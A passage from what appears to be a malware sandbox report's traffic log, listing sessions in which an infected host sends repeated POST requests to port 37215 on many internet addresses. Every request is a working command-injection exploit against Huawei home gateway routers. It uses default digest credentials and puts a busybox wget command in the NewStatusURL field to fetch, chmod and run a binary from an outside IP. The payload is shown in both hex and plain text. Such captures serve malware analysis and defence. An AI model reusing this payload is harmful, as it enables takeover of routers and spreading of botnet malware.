                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              61192.168.2.155161841.24.66.2137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.034060001 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              62192.168.2.1533990165.161.169.8237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.034066916 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              63192.168.2.1547232121.98.142.22837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.034106970 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              64192.168.2.1537470181.31.126.8337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.034106970 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              65192.168.2.1558410156.97.153.22637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.034162998 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              66192.168.2.1533764197.138.132.10237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.034168005 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              67192.168.2.1541732121.212.215.2137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.034193993 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              68192.168.2.156095237.172.12.24437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.034255028 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              69192.168.2.1543150121.139.61.23537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.034260035 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              70192.168.2.1548438222.247.107.19437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.034261942 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              71192.168.2.1550884222.80.126.12737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.034336090 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
